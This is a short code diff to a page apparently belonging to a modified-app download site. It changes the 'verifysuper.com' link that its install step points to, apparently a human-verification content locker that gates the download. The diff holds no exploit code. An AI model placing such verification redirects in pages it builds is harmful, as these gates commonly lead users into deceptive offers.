--- a/itweakvip/OGInject/showbox.html
+++ b/itweakvip/OGInject/showbox.html
@@ -125,7 +125,7 @@
         id("app_name").innerHTML = name;
         id("app-caption-title").innerHTML = name;
 
-        window.lcr = "https://www.verifysuper.com/cl.php?id=30bd9b451bb441cdc176e9cbe2b7eff0";
+        window.lcr = "https://verifysuper.com/cl/i/klpd5q";
         id("install").style.display = "block";
     }
 
